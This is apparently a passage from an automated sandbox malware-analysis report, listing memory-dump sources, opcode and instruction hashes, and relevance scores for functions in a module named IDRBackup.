                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1a6d4b7d70e694d642e38b7f67a926c85b0efd4a218be56cfc94f72f4b9ae774
                                                                                                  • Instruction ID: f50eb0c9d710099c9e36cda64ef9485ce88b719be1985f8746dd3ed3426dbbc4
                                                                                                  • Opcode Fuzzy Hash: 1a6d4b7d70e694d642e38b7f67a926c85b0efd4a218be56cfc94f72f4b9ae774
                                                                                                  • Instruction Fuzzy Hash: AE41C06150C3C25ED70FDB788ABA912BF6A4F0B51470E59CBC4C6AF0A3D2906852DB62
                                                                                                  Function 5000DDBC Relevance: .1, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3aee2a0816077d979255bbba36b0d20920930654fa2e91b6625b7af12c0a1e19
                                                                                                  • Instruction ID: e7091c543f10435a6a23ffde79173a8d0a1473f273009963e1f406fac5c0330f
                                                                                                  • Opcode Fuzzy Hash: 3aee2a0816077d979255bbba36b0d20920930654fa2e91b6625b7af12c0a1e19
                                                                                                  • Instruction Fuzzy Hash: 9241C57150C3C28ED70F9B78C97A526BF799F0B61170B55CBC8869F0A3D7A06452DB22
                                                                                                  Function 5000F3B4 Relevance: .1, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0ed0b2cdb4797004e15f86e26ad3265e17611babe09be66f6d5c4a0f4f2742be
                                                                                                  • Instruction ID: 0870f6b0535de476316ad35050b2644094cf3084e92712b6cf48d64f33b877da
                                                                                                  • Opcode Fuzzy Hash: 0ed0b2cdb4797004e15f86e26ad3265e17611babe09be66f6d5c4a0f4f2742be
                                                                                                  • Instruction Fuzzy Hash: BE41D26150C3C25EC70FDB788ABA512BF6A4F0B51470E49CBC4C6AF0A3D2906842DB62
                                                                                                  Function 5000DDC4 Relevance: .1, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 22416768c5c7c560160f7566024f3dfa129842e08f974bab8689ca34e3557028
                                                                                                  • Instruction ID: cdcb4ea559ec38623fd458517cb3635b6813af3999d092aaae4dfff04222d1f3
                                                                                                  • Opcode Fuzzy Hash: 22416768c5c7c560160f7566024f3dfa129842e08f974bab8689ca34e3557028
                                                                                                  • Instruction Fuzzy Hash: D741D57150C3C28ED70F9B78C97A526BF799F0B61170B45CBC8869F0A3D7A05452DB22
                                                                                                  Function 5000F3BC Relevance: .1, Instructions: 103COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9c0ba2946be4e934cfb6af309a38e24d18ae1d811dd4e4f48ed2dfd9d253d0f6
                                                                                                  • Instruction ID: 96df6c832e6b686c91687481a92e51f4eda9a38bea472512708f17115c3851cb
                                                                                                  • Opcode Fuzzy Hash: 9c0ba2946be4e934cfb6af309a38e24d18ae1d811dd4e4f48ed2dfd9d253d0f6
                                                                                                  • Instruction Fuzzy Hash: A241C26150C3C25EC70FDB788ABE552BF6A4F0B51470F49CBC8C6AF0A3D6905842DB62
                                                                                                  Function 5000DDCC Relevance: .1, Instructions: 103COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a113b94ec32e64551253c0de92a6dc0e21051db4884757aedc432bc759cb32e1
                                                                                                  • Instruction ID: 79b1ac29c7be0de8526c9940f2b8b9ab1423cfc4dc5f83dd6943891c5f5de3da
                                                                                                  • Opcode Fuzzy Hash: a113b94ec32e64551253c0de92a6dc0e21051db4884757aedc432bc759cb32e1
                                                                                                  • Instruction Fuzzy Hash: A041E67150C3C28EC70F9B38C97E526BF799F0B51070B45CBC8869F0A3D6A05442DB22
                                                                                                  Function 5000F3C4 Relevance: .1, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 377dcbb99adbcb434e0cd40737976ad7345ac9f17d7508ae7485f1fb7afcd500
                                                                                                  • Instruction ID: 547cd1405ad6ebc29e666c8d47af22b778838109ed2475185324bead7b444438
                                                                                                  • Opcode Fuzzy Hash: 377dcbb99adbcb434e0cd40737976ad7345ac9f17d7508ae7485f1fb7afcd500
                                                                                                  • Instruction Fuzzy Hash: 3131C26150C3C25EC70BDB788ABE652BF6A4F0B51470F49CBC8C6AF0A3D6905846D772
                                                                                                  Function 5000DDD4 Relevance: .1, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aa371c93f8be3ea5adf81fa5d31ee625fe39997f56c6eb160e88a4112e25e59b
                                                                                                  • Instruction ID: d026c93cd0ffaf857ea3a79b072152a1a65c653a72a900224a556df6533df8bd
                                                                                                  • Opcode Fuzzy Hash: aa371c93f8be3ea5adf81fa5d31ee625fe39997f56c6eb160e88a4112e25e59b
                                                                                                  • Instruction Fuzzy Hash: 1931D67150C3C29EC70B9B38997E516BF799F0751070F45CBC8869F1A3D6A05442DB32
                                                                                                  Function 5000F3CC Relevance: .1, Instructions: 95COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a868bebe2a9508543c0f547311fc6fe15bcb5220372f02094522db7565f9ccd4
                                                                                                  • Instruction ID: 4b3e27420bcdae3d7d9ee813c95c2590bf73f13399b7736b3773871ebb54f839
                                                                                                  • Opcode Fuzzy Hash: a868bebe2a9508543c0f547311fc6fe15bcb5220372f02094522db7565f9ccd4
                                                                                                  • Instruction Fuzzy Hash: 5C31D36150C3C25EC70BDB388ABE652BF6A4F0B52470F49CBC8C6AF0A3D6905842D732
                                                                                                  Function 5000DDDC Relevance: .1, Instructions: 95COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e83d3d0ed83c325f1e68fb5bea9b746f16923610a9e80f9b1b514158a36a98d4
                                                                                                  • Instruction ID: 71bf3338f52435c23b782a3f744daedfed109a32798b94d14563712abc9819ef
                                                                                                  • Opcode Fuzzy Hash: e83d3d0ed83c325f1e68fb5bea9b746f16923610a9e80f9b1b514158a36a98d4
                                                                                                  • Instruction Fuzzy Hash: 4431D57160C3C29EC70B8B38997E616BF799F0751070F49CBC8869F1A7D6A05842DB32
                                                                                                  Function 5000F3D4 Relevance: .1, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6de29b6288df6518dea009e3621f8dcbc0f1abe7c7e1f92af88a93e13ab87424
                                                                                                  • Instruction ID: ab0a210c9060012819722a28ce0b1d7a21dc3a68c761b87af5fd388abcbb25ec
                                                                                                  • Opcode Fuzzy Hash: 6de29b6288df6518dea009e3621f8dcbc0f1abe7c7e1f92af88a93e13ab87424
                                                                                                  • Instruction Fuzzy Hash: 5331C36150D3C25EC70BCB388ABE642BF6A4F0752470F49CBD8C6AF1A3D6905846D732
                                                                                                  Function 5000DDE4 Relevance: .1, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 134f8e424c01b8ee86fb224a9c4f02d321afbb7b9bb1ac60df856540a212cb28
                                                                                                  • Instruction ID: db005d4d217c22ccc033478d0e6ce1f02144a458fc5e8f5b6b6bef3e32fe371e
                                                                                                  • Opcode Fuzzy Hash: 134f8e424c01b8ee86fb224a9c4f02d321afbb7b9bb1ac60df856540a212cb28
                                                                                                  • Instruction Fuzzy Hash: 3C31F67160C3C29EC70B8B38997E616BF799F0711070F49CBC8869F1A7D6A05842DB32
                                                                                                  Function 5000F3DC Relevance: .1, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2d27aeffe552962de140c2b558c15e2eac5bac2f676c0f96a29fd34bbbcd680a
                                                                                                  • Instruction ID: 90050da6681d7e18b3c2b946a6091bd5d1a649a39c03ef36a4d538d43795e1c7
                                                                                                  • Opcode Fuzzy Hash: 2d27aeffe552962de140c2b558c15e2eac5bac2f676c0f96a29fd34bbbcd680a
                                                                                                  • Instruction Fuzzy Hash: A731D16150D3C25ECB0BCB388ABE642BF694F0752470F89CBD8C6AF1A3D6905846C732
                                                                                                  Function 5000DDEC Relevance: .1, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6c532e19e84cec8b0e24595131e6205f0f0dd2e972ddc49d85a843e4604ce2cb
                                                                                                  • Instruction ID: a3be3bd94b086f458b67537973392eb37feff3b14bce38fb5ac49a314b5cebe8
                                                                                                  • Opcode Fuzzy Hash: 6c532e19e84cec8b0e24595131e6205f0f0dd2e972ddc49d85a843e4604ce2cb
                                                                                                  • Instruction Fuzzy Hash: 0F31F87160C3C29EC70B8B38997E656BF795F0711070F49CBD8859F1A7D6A05846DB32
                                                                                                  Function 5000F3E4 Relevance: .1, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3693d5d7c4d8994bf25cef92e3c537f847a0c057638f888d6bb94e17e2cd1c3
                                                                                                  • Instruction ID: ffb9574106903f95e981337fd20e03d09e5f5e3e9a9f0c8ff08fd706da1a4bf7
                                                                                                  • Opcode Fuzzy Hash: a3693d5d7c4d8994bf25cef92e3c537f847a0c057638f888d6bb94e17e2cd1c3
                                                                                                  • Instruction Fuzzy Hash: 1831D46150D3C25EC70BCB388ABE642BF294F0752470F89CBD8C5AF1A3D6905846C732
                                                                                                  Function 5000F3EC Relevance: .1, Instructions: 79COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
